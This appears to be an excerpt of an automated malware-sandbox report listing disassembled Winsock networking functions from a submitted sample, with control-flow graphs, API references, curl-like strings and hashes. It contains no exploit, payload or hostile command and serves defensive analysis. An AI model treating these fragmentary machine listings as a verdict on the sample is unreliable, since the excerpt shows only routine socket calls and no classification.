                                                          control_flow_graph 1493 2576a0-2576be 1494 2576e6-2576f2 send 1493->1494 1495 2576c0-2576c7 1493->1495 1496 2576f4-257709 call 2572a0 1494->1496 1497 25775e-257762 1494->1497 1495->1494 1498 2576c9-2576d1 1495->1498 1496->1497 1500 2576d3-2576e4 1498->1500 1501 25770b-257759 call 2572a0 call 25cb20 call 5d8c50 1498->1501 1500->1496 1501->1497
                                                          APIs
                                                          • send.WS2_32(multi.c,?,?,?,N=%,00000000,?,?,002607BF), ref: 002576EB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: send
                                                          • String ID: LIMIT %s:%d %s reached memlimit$N=%$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                          • API String ID: 2809346765-3276011351
                                                          • Opcode ID: a6d7ddd8f7f4339d6356b914b8884d0ceba813536503802102565bd7335c3e2e
                                                          • Instruction ID: 28aa570b536fc48e3cf6f2a6c3cbbe53b585312bb2b091537618b2efb6c295ea
                                                          • Opcode Fuzzy Hash: a6d7ddd8f7f4339d6356b914b8884d0ceba813536503802102565bd7335c3e2e
                                                          • Instruction Fuzzy Hash: 75113AB5A6C3457BE1209F19BC86D277B9CEFC6B69F040909FC0853351E2B1AC5486B2
                                                          Function 00289290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1612 289290-2892ed call 2576a0 1615 2893c3-2893ce 1612->1615 1616 2892f3-2892fb 1612->1616 1626 2893d0-2893e1 1615->1626 1627 2893e5-289427 call 26d090 call 294f40 1615->1627 1617 2893aa-2893af 1616->1617 1618 289301-289333 call 26d8c0 call 26d9a0 1616->1618 1619 2893b5-2893bc 1617->1619 1620 289456-289470 1617->1620 1636 289335-289364 WSAIoctl 1618->1636 1637 2893a7 1618->1637 1624 289429-289431 1619->1624 1625 2893be 1619->1625 1631 289439-28943f 1624->1631 1632 289433-289437 1624->1632 1625->1620 1626->1619 1628 2893e3 1626->1628 1627->1620 1627->1624 1628->1620 1631->1620 1635 289441-289453 call 2950a0 1631->1635 1632->1620 1632->1631 1635->1620 1640 28939b-2893a4 1636->1640 1641 289366-28936f 1636->1641 1637->1617 1640->1637 1641->1640 1644 289371-289390 setsockopt 1641->1644 1644->1640 1645 289392-289395 1644->1645 1645->1640
                                                          APIs
                                                          • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0028935D
                                                          • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00289389
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: Ioctlsetsockopt
                                                          • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                          • API String ID: 1903391676-2691795271
                                                          • Opcode ID: 82f048f82311e49c8913ed7eb8e9cc173715a988dbf8f832d54466f055f79125
                                                          • Instruction ID: 31dc7b7e2b8c7453ec1e429fec327437fc6732b32fd26e17693a1c3c8f6eea6f
                                                          • Opcode Fuzzy Hash: 82f048f82311e49c8913ed7eb8e9cc173715a988dbf8f832d54466f055f79125
                                                          • Instruction Fuzzy Hash: 6B51D375A10306ABD710EF24C881FBA77A5FF85314F188569FD588B2D2E730E9A1CB91
                                                          Function 00257770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1646 257770-25778e 1647 2577b6-2577c2 recv 1646->1647 1648 257790-257797 1646->1648 1649 2577c4-2577d9 call 2572a0 1647->1649 1650 25782e-257832 1647->1650 1648->1647 1651 257799-2577a1 1648->1651 1649->1650 1653 2577a3-2577b4 1651->1653 1654 2577db-257829 call 2572a0 call 25cb20 call 5d8c50 1651->1654 1653->1649 1654->1650
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                          • API String ID: 1507349165-640788491
                                                          • Opcode ID: 541bbec6ab898aec82277c9b4eefce12e454c0124014ae52ce2eff463e75397a
                                                          • Instruction ID: d871c84347da2a9b1aef9f9d756dc7e2cafcf4f9e0148c916a4f6ec448ba54ca
                                                          • Opcode Fuzzy Hash: 541bbec6ab898aec82277c9b4eefce12e454c0124014ae52ce2eff463e75397a
                                                          • Instruction Fuzzy Hash: 6F117AB1A683447BE1209F18BC4AE677B5CEFC6B29F050519FC0893341E3719C98C6B5
                                                          Function 002575E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1665 2575e0-2575ed 1666 257607-257629 socket 1665->1666 1667 2575ef-2575f6 1665->1667 1669 25763f-257642 1666->1669 1670 25762b-25763c call 2572a0 1666->1670 1667->1666 1668 2575f8-2575ff 1667->1668 1671 257601-257602 1668->1671 1672 257643-257699 call 2572a0 call 25cb20 call 5d8c50 1668->1672 1670->1669 1671->1666
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                          • API String ID: 98920635-842387772
                                                          • Opcode ID: 1de91bf10d4527fe2e04f3b205fce2877a0e0d634489fb95831419e1523b4741
                                                          • Instruction ID: ae5511202ab1ca81a0ea072fb43009d139fcdd29698b18134a6e982202757b8c
                                                          • Opcode Fuzzy Hash: 1de91bf10d4527fe2e04f3b205fce2877a0e0d634489fb95831419e1523b4741
                                                          • Instruction Fuzzy Hash: A2112972A6425237D6115E2DAC5BE9B3B9CEFC2726F040511FC1496392D33188E8D691
                                                          Function 0028A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1774 28a150-28a159 1775 28a15f-28a17b 1774->1775 1776 28a250 1774->1776 1777 28a249-28a24f 1775->1777 1778 28a181-28a1ce getsockname 1775->1778 1777->1776 1779 28a1d0-28a1f5 call 26d090 1778->1779 1780 28a1f7-28a214 call 28ef30 1778->1780 1787 28a240-28a246 call 294f40 1779->1787 1780->1777 1785 28a216-28a23b call 26d090 1780->1785 1785->1787 1787->1777
                                                          APIs
                                                          • getsockname.WS2_32(?,?,00000080), ref: 0028A1C6
                                                          Strings
                                                          • ssloc inet_ntop() failed with errno %d: %s, xrefs: 0028A23B
                                                          • getsockname() failed with errno %d: %s, xrefs: 0028A1F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: getsockname
                                                          • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                          • API String ID: 3358416759-2605427207
                                                          • Opcode ID: 1b547ec2ce3f9b8452b4071c1af708aa46674df47b557e00f4925b0629037fc9
                                                          • Instruction ID: c6355cedbc08a9c0070d54ede8f4b5d1ac6b66346794feaf24e0f71809c3ec85
                                                          • Opcode Fuzzy Hash: 1b547ec2ce3f9b8452b4071c1af708aa46674df47b557e00f4925b0629037fc9
                                                          • Instruction Fuzzy Hash: E421FB31918680AAF7219B28DC42FE673BCEF91334F044615F99853151FE32599687E2
                                                          Function 0026D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1794 26d5e0-26d5ee 1795 26d652-26d662 WSAStartup 1794->1795 1796 26d5f0-26d604 call 26d690 1794->1796 1798 26d664-26d66f 1795->1798 1799 26d670-26d676 1795->1799 1802 26d606-26d614 1796->1802 1803 26d61b-26d651 call 277620 1796->1803 1799->1796 1801 26d67c-26d68d 1799->1801 1802->1803 1808 26d616 1802->1808 1808->1803
                                                          APIs
                                                          • WSAStartup.WS2_32(00000202), ref: 0026D65B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID: if_nametoindex$iphlpapi.dll
                                                          • API String ID: 724789610-3097795196
                                                          • Opcode ID: 7a99f8b27306e702389ec313d88f94e1736dea70446a77373a14f02672cc3bc0
                                                          • Instruction ID: 1df09170d7a8422edff3c9d12be4fbdd59092e767d1b3f67063f04f92d704d74
                                                          • Opcode Fuzzy Hash: 7a99f8b27306e702389ec313d88f94e1736dea70446a77373a14f02672cc3bc0
                                                          • Instruction Fuzzy Hash: AE01F290E6438657EB21AF3CAC177663598AB51308F880568E849922D2FA39C4E9C252
                                                          Function 0031AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1832 31aa30-31aa64 1834 31ab04-31ab09 1832->1834 1835 31aa6a-31aaa7 call 30e730 1832->1835 1836 31ae80-31ae89 1834->1836 1839 31aaa9-31aabd 1835->1839 1840 31ab0e-31ab13 1835->1840 1841 31ab18-31ab50 1839->1841 1842 31aabf-31aac7 1839->1842 1843 31ae2e 1840->1843 1849 31ab58-31ab6d 1841->1849 1842->1843 1844 31aacd-31ab02 1842->1844 1845 31ae30-31ae4a call 30ea60 call 30ebf0 1843->1845 1844->1849 1857 31ae75-31ae7d 1845->1857 1858 31ae4c-31ae57 1845->1858 1851 31ab96-31abab socket 1849->1851 1852 31ab6f-31ab73 1849->1852 1851->1843 1855 31abb1-31abc5 1851->1855 1852->1851 1856 31ab75-31ab8f 1852->1856 1859 31abd0-31abed ioctlsocket 1855->1859 1860 31abc7-31abca 1855->1860 1856->1855 1869 31ab91 1856->1869 1857->1836 1861 31ae59-31ae5e 1858->1861 1862 31ae6e-31ae6f 1858->1862 1864 31ac10-31ac14 1859->1864 1865 31abef-31ac0a 1859->1865 1860->1859 1863 31ad2e-31ad39 1860->1863 1861->1862 1870 31ae60-31ae6c 1861->1870 1862->1857 1867 31ad52-31ad56 1863->1867 1868 31ad3b-31ad4c 1863->1868 1871 31ac37-31ac41 1864->1871 1872 31ac16-31ac31 1864->1872 1865->1864 1874 31ae29 1865->1874 1867->1874 1875 31ad5c-31ad6b 1867->1875 1868->1867 1868->1874 1869->1843 1870->1857 1877 31ac43-31ac46 1871->1877 1878 31ac7a-31ac7e 1871->1878 1872->1871 1872->1874 1874->1843 1882 31ad70-31ad78 1875->1882 1885 31ad04-31ad08 1877->1885 1886 31ac4c-31ac51 1877->1886 1880 31ac80-31ac9b 1878->1880 1881 31ace7-31acfe 1878->1881 1880->1881 1887 31ac9d-31acc1 1880->1887 1881->1885 1888 31ada0-31adae connect 1882->1888 1889 31ad7a-31ad7f 1882->1889 1885->1863 1890 31ad0a-31ad28 1885->1890 1886->1885 1891 31ac57-31ac78 1886->1891 1892 31acc6-31acd7 1887->1892 1894 31adb3-31adcf 1888->1894 1889->1888 1893 31ad81-31ad99 1889->1893 1890->1863 1890->1874 1891->1892 1892->1874 1900 31acdd-31ace5 1892->1900 1893->1894 1901 31add5-31add8 1894->1901 1902 31ae8a-31ae91 1894->1902 1900->1881 1900->1885 1903 31ade1-31adf1 1901->1903 1904 31adda-31addf 1901->1904 1902->1845 1905 31adf3-31ae07 1903->1905 1906 31ae0d-31ae12 1903->1906 1904->1882 1904->1903 1905->1906 1911 31aea8-31aead 1905->1911 1907 31ae14-31ae17 1906->1907 1908 31ae1a-31ae1c call 31af70 1906->1908 1907->1908 1912 31ae21-31ae23 1908->1912 1911->1845 1913 31ae93-31ae9d 1912->1913 1914 31ae25-31ae27 1912->1914 1915 31aeaf-31aeb1 call 30e760 1913->1915 1916 31ae9f-31aea6 call 30e7c0 1913->1916 1914->1845 1920 31aeb6-31aebe 1915->1920 1916->1920 1921 31aec0-31aedb call 30e180 1920->1921 1922 31af1a-31af1f 1920->1922 1921->1845 1925 31aee1-31aeec 1921->1925 1922->1845 1926 31af02-31af06 1925->1926 1927 31aeee-31aeff 1925->1927 1928 31af08-31af0b 1926->1928 1929 31af0e-31af15 1926->1929 1927->1926 1928->1929 1929->1836
                                                          APIs
                                                          • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0031AB9A
                                                          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0031ABE4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: ioctlsocketsocket
                                                          • String ID:
                                                          • API String ID: 416004797-0
                                                          • Opcode ID: e13f5e728f0b80ea532137c184cf236321543566ed5d79f592803e27fff523ba
                                                          • Instruction ID: 6515df006f2c19739ab1c745d740f01de5c3a454c82677ccd7d3a48d4c6c3ad6
                                                          • Opcode Fuzzy Hash: e13f5e728f0b80ea532137c184cf236321543566ed5d79f592803e27fff523ba
                                                          • Instruction Fuzzy Hash: CAE1F270605B019BEB25CF24C884BABB7E5FF8D311F044A2DF9998B291D775D884CB92
                                                          Function 002578B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1869052182.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 00000000.00000002.1869031193.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869052182.0000000000977000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869709167.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.000000000097C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000C13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1869726251.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870181577.0000000000D02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870298906.0000000000EB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1870325930.0000000000EBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_250000_2OJYjm4J1B.jbxd
                                                          Similarity
                                                          • API ID: closesocket
                                                          • String ID: FD %s:%d sclose(%d)
                                                          • API String ID: 2781271927-3116021458
                                                          • Opcode ID: f9b0bc9f48e2d31eb628f79accbba5366d3f9d7247073935d2f2c25ac0ff7121
                                                          • Instruction ID: 4097a2a6f7d25b5dd59e047ebefb75e2a0c1af088bda5662a9a782a1e77f1918
                                                          • Opcode Fuzzy Hash: f9b0bc9f48e2d31eb628f79accbba5366d3f9d7247073935d2f2c25ac0ff7121
                                                          • Instruction Fuzzy Hash: 6ED05E32A592216B852069597C48C9B7BA8EDC6F61F050958FD40A7210D2309C5587E2
                                                          Function 0031B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0031B29E,?,00000000,?,?), ref: 0031B0BA
                                                          • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00303C41,00000000), ref: 0031B0C1
                                                          Memory Dump Source
